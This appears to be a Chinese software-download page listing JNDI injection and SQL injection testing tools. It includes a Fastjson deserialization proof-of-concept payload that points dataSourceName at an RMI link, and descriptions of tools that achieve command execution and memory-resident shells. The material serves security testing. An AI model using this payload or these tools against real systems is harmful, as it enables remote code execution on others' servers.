Advertisement

JNDI Injection Exploit:JNDI注入测试工具(可启动多服务器生成JNDI链接)

  • 5星
  •     浏览量: 0
  •     大小:None
  •      文件类型:None

简介:
JNDI Injection Exploit是一款用于检测JNDI注入漏洞的安全测试工具,支持模拟攻击环境并生成多种类型的JNDI链接以评估系统安全性。 JNDI注入漏洞描述:JNDI-Injection-Exploit是一种工具,用于生成可用的JNDI链接,并通过启动RMI服务器、LDAP服务器和HTTP服务器来提供后台服务。其中,RMI服务器和LDAP服务器基于特定基础进行了修改以与HTTP服务器进行连接。使用此工具可以获取到可利用的JNDI链接,这些链接可用于插入POC(Proof of Concept)中,以便测试系统是否存在漏洞。 例如,在Fastjson的一个漏洞证明代码如下: ``` { @type: com.sun.rowset.JdbcRowSetImpl, dataSourceName: rmi://127.0.0.1:1099/Object, autoCommit: true } ``` 我们可以使用JNDI-Injection-Exploit生成的链接来替换上述代码中的“rmi://127.0.0.1:1099/Object”,以测试系统的漏洞情况。

全部评论 (0)

还没有任何评论哟~
客服
客服
客服关闭
  • JNDI Injection Exploit:JNDIJNDI
    优质
    JNDI Injection Exploit是一款用于检测JNDI注入漏洞的安全测试工具,支持模拟攻击环境并生成多种类型的JNDI链接以评估系统安全性。 JNDI注入漏洞描述:JNDI-Injection-Exploit是一种工具,用于生成可用的JNDI链接,并通过启动RMI服务器、LDAP服务器和HTTP服务器来提供后台服务。其中,RMI服务器和LDAP服务器基于特定基础进行了修改以与HTTP服务器进行连接。使用此工具可以获取到可利用的JNDI链接,这些链接可用于插入POC(Proof of Concept)中,以便测试系统是否存在漏洞。 例如,在Fastjson的一个漏洞证明代码如下: ``` { @type: com.sun.rowset.JdbcRowSetImpl, dataSourceName: rmi://127.0.0.1:1099/Object, autoCommit: true } ``` 我们可以使用JNDI-Injection-Exploit生成的链接来替换上述代码中的“rmi://127.0.0.1:1099/Object”,以测试系统的漏洞情况。
  • JNDI-Injection-Vulnerability-1.0-SNAPSHOT-all.jar
    优质
    JNDI-Injection-Vulnerability-1.0-SNAPSHOT-all.jar是一个用于演示和测试JNDI注入漏洞的Java应用程序jar包,帮助开发者理解并防范此类安全风险。 JNDI(Java Naming and Directory Interface)是Java平台提供的一种服务,用于访问目录和命名工件。它允许应用程序通过统一且标准的方式查找并使用各种资源和服务,如数据库连接、远程对象和其他类型的资源。JNDI 提供了一种与特定实现无关的方法来定位这些资源,并为 Java 应用程序提供了强大的工具以简化管理和配置过程。
  • JNDI Inject Exploit
    优质
    JNDI Inject Exploit是一种利用Java Naming and Directory Interface (JNDI)服务进行远程代码执行的安全漏洞攻击手段,通常通过操纵应用程序加载恶意对象来实现。 ## 免责声明 本工具仅面向合法授权的企业安全测试,在使用本工具进行检测前,请确保该行为符合当地的法律法规,并且已经取得了足够的授权。请勿对非授权目标进行扫描,如您在使用本工具的过程中存在任何非法行为,需自行承担相应后果。 ## 引言 此工具用于解决高版本JDK中的Fastjson、log4j2及原生JNDI注入等场景下的反序列化问题,在这些情况下远程恶意类无法被加载。通过利用LDAP服务器返回原始Java反序列化数据,并结合受害者(客户端)具备的反序列化Gadget依赖,可以实现命令执行、代码执行、回显命令执行以及无文件落地内存马注册等功能。
  • SQL:Structured Query Language Injection
    优质
    本工具为Structured Query Language Injection,专为自动化检测SQL注入漏洞设计,旨在帮助开发者快速定位并修复安全隐患,提升应用程序的安全性。 Structured-query-Language-injection SQL注入自动工具: 多用途 MySQL 注入工具功能包括联合注入、盲注以及支持 POST 和 GET 方法的注入(但POST不工作)。此外还有完整的 information_schema 枚举,表及列模糊测试,数据库信息提取器,列长度查找器,load_file 模糊测试和一般信息收集。该工具还包含 MySQL 哈希破解器。 特点包括循环代理功能,并支持非身份验证或带有代理列表的身份验证代理;可以进行代理身份验证(与带基本身份验证的 Squid 配合使用);每次脚本运行时随机选择浏览器代理,以及调试模式查看每个 URL 请求、使用的代理和浏览器信息。
  • JNDI数据库连配置
    优质
    简介:本文将介绍如何使用Java Naming and Directory Interface (JNDI)技术进行数据库连接配置,包括在应用服务器中设置数据源及编写相关代码来获取和使用数据库资源。 JNDI连接数据库配置代码如下: ```java Context initCtx = new InitialContext(); Context envCtx = (Context) initCtx.lookup(java:comp/env); DataSource ds = (DataSource) envCtx.lookup(jdbc/DevDB); Connection conn = ds.getConnection(); pw.write(Cool, Successful!
    + conn.toString() +
    ); conn.close(); ```
  • 华为IMANA
    优质
    华为服务器IMANA链接工具是专为华为服务器设计的一款管理软件,它能够帮助用户便捷地进行系统监控、维护和故障排查。 华为服务器IMANA连接工具是一款用于管理华为服务器的专用软件工具。它为用户提供便捷的操作界面和强大的功能支持,帮助用户更高效地管理和维护其设备。
  • OPC至OPC
    优质
    本工具有效地实现与OPC服务器的数据交互,支持用户进行各类OPC测试,确保系统间通信顺畅和数据准确性。 用于OPC服务器的测试工具可以很好地读取服务器中的各个数值。
  • JNDI数据源加密
    优质
    TOMCAT8的JNDI功能实现了对用户身份验证信息的安全处理
  • FTP
    优质
    FTP服务器测试工具是一款用于检测和评估文件传输协议(FTP)服务器性能与安全性的软件应用程序。它帮助用户确保FTP服务的稳定性、速度及安全性。 FTP服务器测试工具可以用来修改FTP端口和默认目录设置,使用简单方便,只需双击运行即可。
  • HTTP
    优质
    HTTP服务器测试工具是一种用于评估和优化Web服务器性能、安全性和可靠性的软件应用程序。它可以模拟大量用户访问网站,检测响应时间和错误代码,帮助开发者改进用户体验和网页加载速度。 进行压力测试需要下载相关的服务器与程序,并且需要安装.NET Framework 4.0或以上版本才能使用。